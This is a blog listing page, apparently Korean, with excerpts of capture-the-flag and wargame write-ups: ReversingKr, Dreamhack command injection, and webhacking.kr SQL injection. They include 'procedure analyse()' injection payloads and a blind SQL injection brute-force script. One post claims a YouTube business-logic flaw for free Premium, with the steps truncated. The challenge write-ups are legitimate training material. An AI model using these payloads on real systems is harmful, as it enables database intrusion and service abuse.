호그와트 (366) 썸네일형 리스트형 ReversingKr KeygenMe Find the Name when the Serial is 5B134977135E7D13 5B1 349 771 35E 7D1 3 123 123 123 123 123 1 0x5B 0x13 0x49 0x77 0x13 0x5E 0x7D 0x13 0x는 16진수 xor 연산을 했을 때 원래 값에 해당하는 문자 값이 나온다 (ascii코드로 변형) xor연산은 다시 연산을 하면 원래 값이 나온다 이 문제는 그걸 이용 드림핵 command-injection 01 덕분에 풀었네요 POST /ping HTTP/1.1 Host: host1.dreamhack.games:9833 (중략) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://host1.dreamhack.games:9833/ping Accept-Encodi.. customOS import sys table = '\x12\xD6\x93\xE3\xF4\xDD\x86\x33\x60\x56\x25\xDA\x9B\x9F\x9E\xC9\x9F\xF0\x4C\xAF\xC6\xF5\x49\x00' for i in range(0x20,0x7f): ret = chr(i) temp = i8 trigger = (temp|temp2)&0xff; for j in range(len(table)): a = trigger^ord(table[j]); if(0x20 my vision : 영혼으로 보았기에 이 길을 택했다 그날의 감정을 저는 뭐라고 설명하는 것이 좋은지 모르겠습니다. 어느날 저는 매우 깊은 복음적 감정을 경험했습니다. 매우 깊은 영혼의 떨림 속에서 인류의 공익을 위하여 global network가 원활하게 잘 될 수 있도록 해킹과 보안에 있어서 제 역할을 잘 담당하는 것이 너무나 필요하다는 것을 느꼈습니다. 마치 그리스도가 온 인류를 위해 십자가를 짊어졌다고 하는 것처럼 수많은 사람들의 공익을 위해 작지만 제 일에 최선을 다하는 것이 가장 복음적이라는 확신이 들었습니다. 그것은 책을 읽거나 글을 쓰는 것과는 달랐습니다. 논리적으로 생각하고 책을 읽고 글을 쓰는 건 제가 가장 잘하는 것이고 또 즐겨해왔던 일입니다. 가장 깊은 몰입을 누렸던 영역이기도 합니다 그러나 이러한 사명을 느꼈던 것은 아니었습니다. 그.. 유튜브 프리미엄 공짜로 이용하기 유튜브 프리미엄을 돈 주고 이용하거나 국적을 바꿔서 싸게 이용하거나 (참고로 이 글은 국적 바꿔서 이용하는 글 보다 더 불법적인 부분이 하나도 없다) 기타 등등 많고도 많다. 그런데 유튜브 프리미엄을 공짜로 이용할 수 있는 방법이 있다면 어떨까? 나는 해커이기 때문에 웹 구성이나 전개 방식 등에 굉장히 관심이 많은 편이다. 이걸 조금 유치하게는 '비즈니스 로직 취약점'이라고 부른다. 유튜브에서도 그게 발견되었다. 막상 찾기는 했는데 어떻게 유튜브한테 알려줘야 되는지 모르겠어서 (나는 sns를 전혀 이용하지 않는다) 그냥 블로그에나 자그마하게 공유하고자 한다. 이미 다 알고 있는 내용일 수도 있다. 1)유튜브에 들어가서 원하는 동영상을 찾는다 2) 원하는 동영상이 나오면 그냥 그 동영상을 누른다 3)그 후.. 웹해킹 39번 문제 상당히 흥미로운 문제였다 if($_POST['id']){ $_POST['id'] = str_replace("\\","",$_POST['id']); $_POST['id'] = str_replace("'","''",$_POST['id']); $_POST['id'] = substr($_POST['id'],0,15); $result = mysqli_fetch_array(mysqli_query($db,"select 1 from member where length(id) 웹해킹 53번, 55번 문제 "SELECT id, flag, score FROM chall55 WHERE score=score파라미터 mysqli_query($db,"insert into chall55 values('{$_SESSION['id']}','".trim($_POST['score'])."','{$flag}')"); score=1%20limit%200,%201%20procedure%20analyse() webhacking.chall55.id score=1%20limit%201,%202%20procedure%20analyse() webhacking.chall55.score score=1%20limit%202,%201%20procedure%20analyse() webhacking.chall55.p4ssw0rd_11235813.. Into the unknown flag = '' for n in range(0,100): query = "?score=2147483647 and length(p4ssw0rd_1123581321)={} #".format(i) r = requests.get(url+query, headers=headers) if r.text.find('id : jusb3 // 2147483647') != -1: flag_length = i print("flag_length is ", flag_length) break for i in range(1, flag_length + 1): for j in range(33, 127): query = "?score=2147483647 and ord(right(left(p4ssw0rd_1123581321,{}),.. 이전 1 ··· 39 40 41 42 43 44 45 46 다음